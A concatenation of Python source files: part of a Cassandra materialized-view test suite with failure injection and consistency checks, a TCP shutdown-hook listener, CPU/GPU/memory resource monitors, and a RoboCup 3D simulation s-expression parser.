* Fails base table write before or after applying views
* Restart node and replay commit and batchlog
* Check that base and views are present
@jira_ticket CASSANDRA-13069
"""
self.cluster.set_batch_commitlog(enabled=True)
self.fixture_dtest_setup.ignore_log_patterns = [r'Dummy failure', r"Failed to force-recycle all segments"]
self.prepare(rf=1, install_byteman=True)
node1, node2, node3 = self.cluster.nodelist()
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
session.execute("CREATE TABLE t (id int PRIMARY KEY, v int, v2 text, v3 decimal)")
session.execute(("CREATE MATERIALIZED VIEW t_by_v AS SELECT * FROM t "
"WHERE v IS NOT NULL AND id IS NOT NULL PRIMARY KEY (v, id)"))
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug('Make node1 fail {} view writes'.format(fail_phase))
node1.byteman_submit([mk_bman_path('fail_{}_view_write.btm'.format(fail_phase))])
logger.debug('Write 1000 rows - all node1 writes should fail')
failed = False
for i in range(1, 1000):
try:
session.execute("INSERT INTO t (id, v, v2, v3) VALUES ({v}, {v}, 'a', 3.0) USING TIMESTAMP {v}".format(v=i))
except WriteFailure:
failed = True
assert failed, "Should fail at least once."
assert node1.grep_log("Dummy failure"), "Should throw Dummy failure"
missing_entries = 0
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
if not base_entry:
missing_entries += 1
if not view_entry:
missing_entries += 1
logger.debug("Missing entries {}".format(missing_entries))
assert missing_entries > 0
logger.debug('Restarting node1 to ensure commit log is replayed')
node1.stop(wait_other_notice=True)
# Set batchlog.replay_timeout_seconds=1 so we can ensure batchlog will be replayed below
node1.start(jvm_args=["-Dcassandra.batchlog.replay_timeout_in_ms=1"])
logger.debug('Replay batchlogs')
time.sleep(0.001) # Wait batchlog.replay_timeout_in_ms=1 (ms)
self._replay_batchlogs()
logger.debug('Verify that both the base table entry and view are present after commit and batchlog replay')
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
for i in range(1, 1000):
view_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t_by_v WHERE id = {} AND v = {}".format(i, i),
consistency_level=ConsistencyLevel.ONE)))
base_entry = rows_to_list(session.execute(SimpleStatement("SELECT * FROM t WHERE id = {}".format(i),
consistency_level=ConsistencyLevel.ONE)))
assert base_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
assert view_entry, "Both base {} and view entry {} should exist.".format(base_entry, view_entry)
# For read verification
class MutationPresence(Enum):
match = 1
extra = 2
missing = 3
excluded = 4
unknown = 5
class MM(object):
mp = None
def out(self):
pass
class Match(MM):
def __init__(self):
self.mp = MutationPresence.match
def out(self):
return None
class Extra(MM):
expecting = None
value = None
row = None
def __init__(self, expecting, value, row):
self.mp = MutationPresence.extra
self.expecting = expecting
self.value = value
self.row = row
def out(self):
return "Extra. Expected {} instead of {}; row: {}".format(self.expecting, self.value, self.row)
class Missing(MM):
value = None
row = None
def __init__(self, value, row):
self.mp = MutationPresence.missing
self.value = value
self.row = row
def out(self):
return "Missing. At {}".format(self.row)
class Excluded(MM):
def __init__(self):
self.mp = MutationPresence.excluded
def out(self):
return None
class Unknown(MM):
def __init__(self):
self.mp = MutationPresence.unknown
def out(self):
return None
readConsistency = ConsistencyLevel.QUORUM
writeConsistency = ConsistencyLevel.QUORUM
SimpleRow = collections.namedtuple('SimpleRow', 'a b c d')
def row_generate(i, num_partitions):
return SimpleRow(a=i % num_partitions, b=(i % 400) // num_partitions, c=i, d=i)
# Create a threaded session and execute queries from a Queue
def thread_session(ip, queue, start, end, rows, num_partitions):
def execute_query(session, select_gi, i):
row = row_generate(i, num_partitions)
if (row.a, row.b) in rows:
base = rows[(row.a, row.b)]
else:
base = -1
gi = list(session.execute(select_gi, [row.c, row.a]))
if base == i and len(gi) == 1:
return Match()
elif base != i and len(gi) == 1:
return Extra(base, i, (gi[0][0], gi[0][1], gi[0][2], gi[0][3]))
elif base == i and len(gi) == 0:
return Missing(base, i)
elif base != i and len(gi) == 0:
return Excluded()
else:
return Unknown()
try:
cluster = Cluster([ip])
session = cluster.connect()
select_gi = session.prepare("SELECT * FROM mvtest.mv1 WHERE c = ? AND a = ?")
select_gi.consistency_level = readConsistency
for i in range(start, end):
ret = execute_query(session, select_gi, i)
queue.put_nowait(ret)
except Exception as e:
print(str(e))
queue.close()
@since('3.0')
@pytest.mark.skipif(sys.platform == 'win32', reason='Bug in python on Windows: https://bugs.python.org/issue10128')
class TestMaterializedViewsConsistency(Tester):
def prepare(self, user_table=False):
cluster = self.cluster
cluster.set_configuration_options({'enable_materialized_views': 'true'})
cluster.populate(3).start()
node2 = cluster.nodelist()[1]
# Keep the status of async requests
self.exception_type = collections.Counter()
self.num_request_done = 0
self.counts = {}
for mp in MutationPresence:
self.counts[mp] = 0
self.rows = {}
self.update_stats_every = 100
logger.debug("Set to talk to node 2")
self.session = self.patient_cql_connection(node2)
return self.session
def _print_write_status(self, row):
output = "\r{}".format(row)
for key in list(self.exception_type.keys()):
output = "{} ({}: {})".format(output, key, self.exception_type[key])
logger.debug(output)
def _print_read_status(self, row):
if self.counts[MutationPresence.unknown] == 0:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing])
)
else:
logger.debug(
"\rOn {}; match: {}; extra: {}; missing: {}; WTF: {}".format(
row,
self.counts[MutationPresence.match],
self.counts[MutationPresence.extra],
self.counts[MutationPresence.missing],
self.counts[MutationPresence.unkown])
)
def _do_row(self, insert_stmt, i, num_partitions):
# Error callback for async requests
def handle_errors(row, exc):
self.num_request_done += 1
try:
name = type(exc).__name__
self.exception_type[name] += 1
except Exception as e:
print(traceback.format_exception_only(type(e), e))
# Success callback for async requests
def success_callback(row):
self.num_request_done += 1
if i % self.update_stats_every == 0:
self._print_write_status(i)
row = row_generate(i, num_partitions)
async_ret = self.session.execute_async(insert_stmt, row)
errors = partial(handle_errors, row)
async_ret.add_callbacks(success_callback, errors)
def _populate_rows(self):
statement = SimpleStatement(
"SELECT a, b, c FROM mvtest.test1",
consistency_level=readConsistency
)
data = self.session.execute(statement)
for row in data:
self.rows[(row.a, row.b)] = row.c
@pytest.mark.skip(reason='awaiting CASSANDRA-11290')
def test_single_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a single partition
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(1)
def test_multi_partition_consistent_reads_after_write(self):
"""
Tests consistency of multiple writes to a multiple partitions
@jira_ticket CASSANDRA-10981
"""
self._consistent_reads_after_write_test(5)
def _consistent_reads_after_write_test(self, num_partitions):
session = self.prepare()
node1, node2, node3 = self.cluster.nodelist()
# Test config
lower = 0
upper = 100000
processes = 4
queues = [None] * processes
eachProcess = (upper - lower) // processes
logger.debug("Creating schema")
session.execute(
("CREATE KEYSPACE IF NOT EXISTS mvtest WITH replication = "
"{'class': 'SimpleStrategy', 'replication_factor': '3'}")
)
session.execute(
"CREATE TABLE mvtest.test1 (a int, b int, c int, d int, PRIMARY KEY (a,b))"
)
session.cluster.control_connection.wait_for_schema_agreement()
insert1 = session.prepare("INSERT INTO mvtest.test1 (a,b,c,d) VALUES (?,?,?,?)")
insert1.consistency_level = writeConsistency
logger.debug("Writing data to base table")
for i in range(upper // 10):
self._do_row(insert1, i, num_partitions)
logger.debug("Creating materialized view")
session.execute(
('CREATE MATERIALIZED VIEW mvtest.mv1 AS '
'SELECT a,b,c,d FROM mvtest.test1 WHERE a IS NOT NULL AND b IS NOT NULL AND '
'c IS NOT NULL PRIMARY KEY (c,a,b)')
)
session.cluster.control_connection.wait_for_schema_agreement()
logger.debug("Writing more data to base table")
for i in range(upper // 10, upper):
self._do_row(insert1, i, num_partitions)
# Wait that all requests are done
while self.num_request_done < upper:
time.sleep(1)
logger.debug("Making sure all batchlogs are replayed on node1")
node1.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node2")
node2.nodetool("replaybatchlog")
logger.debug("Making sure all batchlogs are replayed on node3")
node3.nodetool("replaybatchlog")
logger.debug("Finished writes, now verifying reads")
self._populate_rows()
threads = []
for i in range(processes):
start = lower + (eachProcess * i)
if i == processes - 1:
end = upper
else:
end = lower + (eachProcess * (i + 1))
q = Queue()
node_ip = get_ip_from_node(node2)
t = threading.Thread(target=thread_session, args=(node_ip, q, start, end, self.rows, num_partitions))
threads.append(t)
t.daemon = True
t.start()
queues[i] = q
for i in range(lower, upper):
if i % 100 == 0:
self._print_read_status(i)
try:
mm = queues[i % processes].get(timeout=60)
except Empty as e:
pytest.skip("Failed to get range {range} within timeout from queue. {error}".format(range=i, error=str(e)))
if not mm.out() is None:
logger.debug("\r{}\n" .format(mm.out()))
self.counts[mm.mp] += 1
self._print_read_status(upper)
for thread in threads:
thread.join(timeout=300)
@since('3.0')
class TestMaterializedViewsLockcontention(Tester):
"""
Test materialized views lock contention.
@jira_ticket CASSANDRA-12689
@since 3.0
"""
def _prepare_cluster(self):
self.cluster.populate(1)
self.cluster.set_configuration_options({'enable_materialized_views': 'true'})
self.supports_v5_protocol = self.supports_v5_protocol(self.cluster.version())
self.protocol_version = 5 if self.supports_v5_protocol else 4
self.cluster.set_configuration_options(values={
'concurrent_materialized_view_writes': 1,
'concurrent_writes': 1,
})
self.nodes = list(self.cluster.nodes.values())
self.cluster.start(jvm_args=[
"-Dcassandra.test.fail_mv_locks_count=64"
])
session = self.patient_exclusive_cql_connection(self.nodes[0], protocol_version=self.protocol_version)
keyspace = "locktest"
session.execute("""
CREATE KEYSPACE IF NOT EXISTS {}
WITH replication = {{ 'class': 'SimpleStrategy', 'replication_factor': '1' }}
""".format(keyspace))
session.set_keyspace(keyspace)
session.execute(
"CREATE TABLE IF NOT EXISTS test (int1 int, int2 int, date timestamp, PRIMARY KEY (int1, int2))")
session.execute("""CREATE MATERIALIZED VIEW test_sorted_mv AS
SELECT int1, date, int2
FROM test
WHERE int1 IS NOT NULL AND date IS NOT NULL AND int2 IS NOT NULL
PRIMARY KEY (int1, date, int2)
WITH CLUSTERING ORDER BY (date DESC, int2 DESC)""")
return session
@since('3.0')
def test_mutations_dontblock(self):
session = self._prepare_cluster()
records = 100
records2 = 100
params = []
for x in range(records):
for y in range(records2):
params.append([x, y])
execute_concurrent_with_args(
session,
session.prepare('INSERT INTO test (int1, int2, date) VALUES (?, ?, toTimestamp(now()))'),
params
)
assert_one(session, "SELECT count(*) FROM test WHERE int1 = 1", [records2])
for node in self.nodes:
with JolokiaAgent(node) as jmx:
mutationStagePending = jmx.read_attribute(
make_mbean('metrics', type="ThreadPools", path='request', scope='MutationStage', name='PendingTasks'), "Value"
)
assert 0 == mutationStagePending, "Pending mutations: {}".format(mutationStagePending)
|
shutdn.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2022 Busana Apparel Group. All rights reserved.
#
# This product and it's source code is protected by patents, copyright laws and
# international copyright treaties, as well as other intellectual property
# laws and treaties. The product is licensed, not sold.
#
# The source code and sample programs in this package or parts hereof
# as well as the documentation shall not be copied, modified or redistributed
# without permission, explicit or implied, of the author.
#
# This module is part of Centric PLM Integration Bridge and is released under
# the Apache-2.0 License: https://www.apache.org/licenses/LICENSE-2.0
from threading import Thread, RLock
from socket import AF_INET, socket, SOCK_STREAM
from common.startable import Startable
from common.singleton import SingletonObject
from common import consts
import logging
import selectors
class ShutdownHookMonitor(Startable, SingletonObject):
def __init__(self, config=None):
super(ShutdownHookMonitor, self).__init__(config=config)
self.socket = None
self.selector = None
self.shutdown_thread = None
self.shutdown_addr = None
self.shutdown_port = None
def send_shutdown_signal(self):
config = self.get_configuration()
self.shutdown_addr = config[consts.SHUTDOWN_ADDR] if config and consts.SHUTDOWN_ADDR in config \
else consts.DEFAULT_SHUTDOWN_ADDR
self.shutdown_port = config[consts.SHUTDOWN_PORT] if config and consts.SHUTDOWN_PORT in config \
else consts.DEFAULT_SHUTDOWN_PORT
self.shutdown_port = int(self.shutdown_port) if isinstance(self.shutdown_port, str) else self.shutdown_port
client = socket(AF_INET, SOCK_STREAM)
client.connect((self.shutdown_addr, self.shutdown_port))
try:
fd = client.makefile(mode="w")
try:
fd.write("shut\n")
fd.flush()
finally:
fd.close()
finally:
client.close()
def join(self, timeout=None):
if not self.is_running():
raise Exception("Shutdown Listener is not Running")
self.shutdown_thread.join(timeout)
def do_configure(self):
config = self.get_configuration()
self.selector = selectors.DefaultSelector()
self.socket = socket(AF_INET, SOCK_STREAM)
self.shutdown_addr = config[consts.SHUTDOWN_ADDR] if config and consts.SHUTDOWN_ADDR in config \
else consts.DEFAULT_SHUTDOWN_ADDR
self.shutdown_port = config[consts.SHUTDOWN_PORT] if config and consts.SHUTDOWN_PORT in config \
else consts.DEFAULT_SHUTDOWN_PORT
self.shutdown_port = int(self.shutdown_port) if isinstance(self.shutdown_port, str) else self.shutdown_port
self.shutdown_thread = Thread(target=self.listen, daemon=True, name="StopMonitor")
def do_start(self):
self.shutdown_thread.start()
def do_stop(self):
if not self.socket:
return
try:
self.socket.close()
except Exception as ex:
logging.exception(ex)
def listen(self):
should_terminate = False
self.socket.bind((self.shutdown_addr, self.shutdown_port))
self.socket.setblocking(False)
self.socket.listen(1)
self.selector.register(self.socket, selectors.EVENT_READ)
while self.is_running():
try:
events = self.selector.select(timeout=2)
for ev, _ in events:
event_socket = ev.fileobj
if event_socket == self.socket:
conn, __ = event_socket.accept()
conn.setblocking(False)
self.selector.register(conn, selectors.EVENT_READ)
else:
try:
fp = event_socket.makefile('r', buffering=1024)
message = fp.readline()
fp.close()
should_terminate = isinstance(message, str) and (message.strip().lower() == 'shut')
finally:
event_socket.close()
except Exception as ex:
logging.error(ex)
finally:
self.stop() if should_terminate else None
|
monitor.py | """ Monitoring (memory usage, cpu/gpu utilization) tools. """
import os
import time
from math import ceil
from ast import literal_eval
from multiprocessing import Process, Manager, Queue
import numpy as np
import matplotlib.pyplot as plt
try:
import psutil
except ImportError:
pass
try:
import nvidia_smi
except ImportError:
# Use this value to raise ImportError later
nvidia_smi = None
class ResourceMonitor:
""" Periodically runs supplied function in a separate process and stores its outputs.
The created process runs infinitely until it is killed by SIGKILL signal.
Parameters
----------
function : callable
Function to use. If not provided, defaults to the `get_usage` static method.
frequency : number
Periodicity of function calls in seconds.
**kwargs
Passed directly to `function` calls.
Attributes
----------
data : list
Collected function outputs. Preserved between multiple runs.
ticks : list
Times of function calls. Preserved between multiple runs.
"""
def __init__(self, function=None, frequency=0.1, **kwargs):
self.function = function or self.get_usage
self.frequency = frequency
self.kwargs = kwargs
self.pid = os.getpid()
self.running = False
self.manager = None
self.stop_queue = None
self.shared_list = None
self.process = None
self.start_time, self.prev_time, self.end_time = None, None, None
self.ticks, self.data = [], []
@staticmethod
def endless_repeat(shared_list, stop_queue, function, frequency, **kwargs):
""" Repeat `function` and storing results, until `stop` signal is recieved. """
while stop_queue.empty():
# As this process is killed ungracefully, it can be shut down in the middle of data appending.
# We let Python handle it by ignoring the exception.
try:
shared_list.append(function(**kwargs))
except (BrokenPipeError, ConnectionResetError):
pass
time.sleep(frequency)
def start(self):
""" Start a separate process with function calls every `frequency` seconds. """
self.running = True
self.manager = Manager()
self.shared_list = self.manager.list()
self.stop_queue = Queue()
self.start_time = time.time()
self.prev_time = self.start_time
args = self.shared_list, self.stop_queue, self.function, self.frequency
self.process = Process(target=self.endless_repeat, args=args, kwargs={'pid': self.pid, **self.kwargs})
self.process.start()
def fetch(self):
""" Append collected data to the instance attributes. """
n = len(self.data)
# We copy data so additional points don't appear during this function execution
self.data = self.shared_list[:]
self.end_time = time.time()
# Compute one more entry
point = self.function(pid=self.pid, **self.kwargs)
tick = time.time()
# Update timestamps, append additional entries everywhere
# If data was appended to `shared_list` during the execution of this function, the order might be wrong;
# But, as it would mean that the time between calls to `self.function` is very small, it is negligeable.
self.ticks.extend(np.linspace(self.prev_time, self.end_time, num=len(self.data) - n).tolist())
self.data.append(point)
self.shared_list.append(point)
self.ticks.append(tick)
self.prev_time = time.time()
def stop(self):
""" Stop separate process. """
if self.running:
self.stop_queue.put(True)
self.process.join()
self.running = False
self.manager.shutdown()
def __enter__(self):
self.start()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.fetch()
self.stop()
def visualize(self):
""" Simple plots of collected data-points. """
plt.figure(figsize=(8, 6))
plt.plot(np.array(self.ticks) - self.ticks[0], self.data)
name = self.__class__.__name__
if 'GPU' in name:
used_gpus = self.kwargs.get('gpu_list', get_current_gpus())
if len(used_gpus) == 1:
name = f'{name} on device `{used_gpus[0]}`'
else:
name = f'{name} on devices `{str(used_gpus)[1:-1]}`'
title = f'{name}\nMEAN: {np.mean(self.data):4.4} STD: {np.std(self.data):4.4}'
plt.title(title)
plt.xlabel('Time, s', fontsize=12)
plt.ylabel(self.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
plt.grid(True)
plt.show()
class CPUMonitor(ResourceMonitor):
""" Track CPU usage. """
UNIT = '%'
@staticmethod
def get_usage(**kwargs):
""" Track CPU usage. """
_ = kwargs
return psutil.cpu_percent()
class MemoryMonitor(ResourceMonitor):
""" Track total virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(**kwargs):
""" Track total virtual memory usage. """
_ = kwargs
return psutil.virtual_memory().used / (1024 **3)
class RSSMonitor(ResourceMonitor):
""" Track non-swapped physical memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track non-swapped physical memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_info().rss / (1024 ** 3) # gbytes
class VMSMonitor(ResourceMonitor):
""" Track current process virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track current process virtual memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_info().vms / (1024 ** 3) # gbytes
class USSMonitor(ResourceMonitor):
""" Track current process unique virtual memory usage. """
UNIT = 'Gb'
@staticmethod
def get_usage(pid=None, **kwargs):
""" Track current process unique virtual memory usage. """
_ = kwargs
process = psutil.Process(pid)
return process.memory_full_info().uss / (1024 ** 3) # gbytes
def get_current_gpus():
""" If the `CUDA_VISIBLE_DEVICES` is set, check it and return device numbers. Otherwise, return [0]. """
env_variable = os.environ.get('CUDA_VISIBLE_DEVICES', '0')
env_variable = literal_eval(env_variable)
return list(env_variable) if isinstance(env_variable, tuple) else [env_variable]
class GPUMonitor(ResourceMonitor):
""" Track GPU usage. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU usage. """
_ = kwargs
gpu_list = gpu_list or get_current_gpus()
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
return [item.gpu for item in res]
class GPUMemoryUtilizationMonitor(ResourceMonitor):
""" Track GPU memory utilization. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU memory utilization. """
_ = kwargs
gpu_list = gpu_list or get_current_gpus()
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetUtilizationRates(item) for item in handle]
return [item.memory for item in res]
class GPUMemoryMonitor(ResourceMonitor):
""" Track GPU memory usage. """
UNIT = '%'
def __init__(self, *args, **kwargs):
if nvidia_smi is None:
raise ImportError('Install Python interface for nvidia_smi')
super().__init__(*args, **kwargs)
@staticmethod
def get_usage(gpu_list=None, **kwargs):
""" Track GPU memory usage. """
_ = kwargs
gpu_list = gpu_list or get_current_gpus()
nvidia_smi.nvmlInit()
handle = [nvidia_smi.nvmlDeviceGetHandleByIndex(i) for i in gpu_list]
res = [nvidia_smi.nvmlDeviceGetMemoryInfo(item) for item in handle]
res = [100 * item.used / item.total for item in res]
nvidia_smi.nvmlShutdown()
return res
MONITOR_ALIASES = {
MemoryMonitor: ['mmonitor', 'memory', 'memorymonitor'],
CPUMonitor: ['cmonitor', 'cpu', 'cpumonitor'],
RSSMonitor: ['rss'],
VMSMonitor: ['vms'],
USSMonitor: ['uss'],
GPUMonitor: ['gpu'],
GPUMemoryMonitor: ['gpu_memory'],
GPUMemoryUtilizationMonitor: ['gpu_memory_utilization']
}
MONITOR_ALIASES = {alias: monitor for monitor, aliases in MONITOR_ALIASES.items()
for alias in aliases}
class Monitor(list):
""" Holder for multiple monitors with simple visualization method. """
def __init__(self, monitors=('cpu', 'memory', 'gpu'), frequency=0.1, **kwargs):
monitors = [monitors] if not isinstance(monitors, (tuple, list)) else monitors
monitors = [MONITOR_ALIASES[monitor.lower()](frequency=frequency, **kwargs)
if isinstance(monitor, str) else monitor
for monitor in monitors]
super().__init__(monitors)
def __enter__(self):
for monitor in self:
monitor.start()
return self[0] if len(self) == 0 else self
def __exit__(self, exc_type, exc_value, exc_traceback):
for monitor in self:
monitor.fetch()
monitor.stop()
def visualize(self, layout=None, figsize=None, suptitle='', savepath=None, show=True):
""" Visualize multiple monitors in a single figure.
Parameters
----------
layout : tuple of ints
Grid layout of plots.
figsize : tuple of numbers
Size of figure: width and height.
suptitle : str
Title for the figure.
"""
if layout is None:
layout = ceil(len(self) / 3), 3 if len(self) > 2 else len(self)
figsize = figsize or (7 * layout[1], 8 * layout[0])
fig, ax = plt.subplots(*layout, figsize=figsize)
ax = np.atleast_2d(ax)
for i, monitor in enumerate(self):
name = monitor.__class__.__name__
if 'GPU' in name:
used_gpus = monitor.kwargs.get('gpu_list', get_current_gpus())
if len(used_gpus) == 1:
name = f'{name} on device `{used_gpus[0]}`'
else:
name = f'{name} on devices `{str(used_gpus)[1:-1]}`'
title = f'{name}\nMEAN: {np.mean(monitor.data):4.4} STD: {np.std(monitor.data):4.4}'
ax[i // layout[1], i % layout[1]].plot(np.array(monitor.ticks) - monitor.ticks[0], monitor.data)
ax[i // layout[1], i % layout[1]].set_title(title, fontsize=16)
ax[i // layout[1], i % layout[1]].set_xlabel('Time, s', fontsize=14)
ax[i // layout[1], i % layout[1]].set_ylabel(monitor.UNIT, fontsize=12, rotation='horizontal', labelpad=15)
ax[i // layout[1], i % layout[1]].grid(True)
for i in range(len(self), layout[0] * layout[1]):
ax[i // layout[1], i % layout[1]].set_axis_off()
if suptitle:
fig.suptitle(suptitle, fontsize=24)
if savepath:
plt.savefig(savepath, bbox_inches='tight', pad_inches=0)
if show:
plt.show()
else:
plt.close()
|
sExprInterface.py | #!/usr/bin/python
"""
# Copyright (C) 2014-2015 Open Source Robotics Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Script for restoring RoboCup 3D sim game from logfile
# Written by Patrick MacAlpine (patmac@cs.utexas.edu)
# Usage: ./sExprInterface.py <logFile> [host] [port]
"""
import config
import os
import sys
import struct
import socket #for sockets
import threading
import time
import rospy
from threading import Lock
from robocup_msgs.msg import AgentState
from robocup_msgs.msg import Beam
from robocup_msgs.srv import SendJoints
from robocup_msgs.srv import InitAgent
from robocup_msgs.srv import MoveAgentPose
class agentInterface:
def __init__(self):
# Agent internal data values
self._agentTree = []
self._initializeAgentValues()
# Server internal data values
self._serverTree = []
self._initializeServerValues()
self._serverTime = 0
self._lastStateTime = rospy.Time()
self._lastPerceptionTime = rospy.Time()
self._lastMessageSentTime = rospy.Time()
self.mutex = Lock()
# Get tree from s-expression
def _getTreeFromSExpr(self, sExpr):
tree = []
current = tree
stack = [current]
tokens = sExpr.split()
symbol = ""
for t in tokens:
if symbol != "":
current.append(symbol)
symbol = ""
for i in range(len(t)):
if '(' == t[i]:
if symbol != "":
current.append(symbol)
empty = []
current.append(empty)
stack.append(current)
current = empty
symbol = ""
elif ')' == t[i]:
if symbol != "":
current.append(symbol)
symbol = ""
current = stack.pop()
else:
symbol = symbol + t[i]
return tree
# == Private agent methods ==
def _initializeAgentValues(self):
self._agentScene = None
self._agentInit = None
self._agentBeam = None
self._agentJointRequests = []
self._agentSay = None
def _populateAgentValuesFromTree(self):
self._initializeAgentValues()
for i in self._agentTree:
if i[0] == 'scene':
self._agentScene = i[1]
elif i[0] == 'init':
self._agentInit = (i[1][1], i[2][1])
elif i[0] == 'beam':
self._agentBeam = (i[1], i[2], i[3])
elif i[0].startswith("he") or i[0].startswith("lae") or i[0].startswith("lle") or i[0].startswith("rae") or i[0].startswith("rle"):
self._agentJointRequests.append((i[0], i[1]))
elif i[0] == 'say':
self._agentSay = i[1]
elif i[0] != 'syn':
print "Unknown agent message type: " + i[0]
# == Public agent methods ==
def printAgentValues(self):
print "Scene: " + str(self.getAgentScene())
print "Init: " + str(self.getAgentInit())
print "Beam: " + str(self.getAgentBeam())
print "JointRequests: " + str(self.getAgentJointRequests())
print "Say: " + str(self.getAgentSay())
# Returns scene or None if scene doesn't exist
def getAgentScene(self):
return self._agentScene
# Returns (unum, teamname) init values or None if init doesn't exist
def getAgentInit(self):
return self._agentInit
# Returns (x, y, a) beam values or None if beam doesn't exist
def getAgentBeam(self):
return self._agentBeam
# Returns [(name, value), ...] joint requests
def getAgentJointRequests(self):
return self._agentJointRequests
# Returns say or None if say doesn't exist
def getAgentSay(self):
return self._agentSay
# == Private server methods ==
def _initializeServerValues(self):
#self._serverTime = None
#self._serverTime = 0
#self._serverGameStateID = None
self._serverGameStateID = 1
#self._serverGameStateSide = None
self._serverGameStateSide = 'left'
#self._serverGameStateTime = None
self._serverGameStateTime = 0
#self._serverGameStatePlayMode = None
self._serverGameStatePlayMode = 'BeforeKickOff'
self._serverGameStateScoreLeft = None
self._serverGameStateScoreRight = None
self._serverGyro = None
self._serverAccel = None
#self._serverForceResistancePerceptors = []
self._serverForceResistancePerceptors = [('lf', (0, 0, 0), (0, 0, 0)), ('rf', (0, 0, 0), (0, 0, 0))]
self._serverHingeJoints = []
self._serverHear = None
self._serverSeenObjects = []
self._serverSeenPlayers = []
self._serverSeenLines = []
self._serverMyPos = None
self._serverMyOrien = None
self._serverBallPos = None
def _populateServerValuesFromTree(self):
self._initializeServerValues()
for i in self._serverTree:
if i[0] == 'time':
self._serverTime = i[1][1]
elif i[0] == 'GS':
self._serverGameState = []
for j in i[1:]:
if j[0] == 'unum':
self._serverGameStateID = j[1]
elif j[0] == 'team':
self._serverGameStateSide = j[1]
elif j[0] == 't':
self._serverGameStateTime = j[1]
elif j[0] == 'pm':
self._serverGameStatePlayMode = j[1]
elif j[0] == 'sl':
self._serverGameStateScoreLeft = j[1]
elif j[0] == 'sr':
self._serverGameStateScoreRight = j[1]
else:
print "Unknown server game state type: " + j[0]
self._agentInit = (i[1][1], i[2][1])
elif i[0] == 'GYR':
self._serverGyro = (i[1][1], i[2][1], i[2][2], i[2][3])
elif i[0] == 'ACC':
self._serverAccel = (i[1][1], i[2][1], i[2][2], i[2][3])
elif i[0] == 'FRP':
self._serverForceResistancePerceptors.append((i[1][1], (i[2][1], i[2][2], i[2][3]), (i[3][1], i[3][2], i[3][3])))
elif i[0] == 'HJ':
self._serverHingeJoints.append((i[1][1], i[2][1]))
elif i[0] == 'hear':
self._serverHear = i[1:]
elif i[0] == 'See':
for j in i[1:]:
if j[0] == 'P':
player = [j[1][1], j[2][1]]
bodyParts = []
for k in j[3:]:
if k[0] == 'head' or k[0] == 'rlowerarm' or k[0] == 'llowerarm' or k[0] == 'rfoot' or k[0] == 'lfoot':
bodyParts.append((k[0], k[1][1], k[1][2], k[1][3]))
else:
print "Unknown server player body part type: " + k[0]
player.append(bodyParts)
self._serverSeenPlayers.append(player)
elif j[0] == 'L':
self._serverSeenLines.append(((j[1][1], j[1][2], j[1][3]), (j[2][1], j[2][2], j[2][3])))
elif j[0] == 'B' or j[0] == 'G1L' or j[0] == 'G1R' or j[0] == 'G2L' or j[0] == 'G2R' or j[0] == 'F1L' or j[0] == 'F1R' or j[0] == 'F2L' or j[0] == 'F2R':
self._serverSeenObjects.append((j[0], j[1][1], j[1][2], j[1][3]))
elif j[0] == 'mypos':
self._serverMyPos = (j[1], j[2], j[3])
elif j[0] == 'myorien':
self._serverMyOrien = j[1]
elif j[0] == 'ballpos':
self._serverBallPos = (j[1], j[2], j[3])
else:
print "Unknown server vision type: " + j[0]
else:
print "Unknown server message type: " + i[0]
# == Public server methods ==
def makeTimeSExpr(self, time):
return "(time (now " + str(time) + "))"
# uNum and side are currently only given once right after an agent connects. Side is either left or right
def makeGameStateSExpr(self, gameTime, playMode, scoreLeft=None, scoreRight=None, uNum=None, side=None):
ret = "(GS"
if uNum != None:
ret = ret + " (unum " + str(uNum) + ")"
if side != None:
ret = ret + " (team " + str(side) + ")"
ret = ret + " (t " + str(gameTime) + ") (pm " + str(playMode) + ")"
if scoreLeft != None:
ret = ret + " (sl " + str(scoreLeft) + ")"
if scoreRight != None:
ret = ret + " (sr " + str(scoreRight) + ")"
return ret + ")"
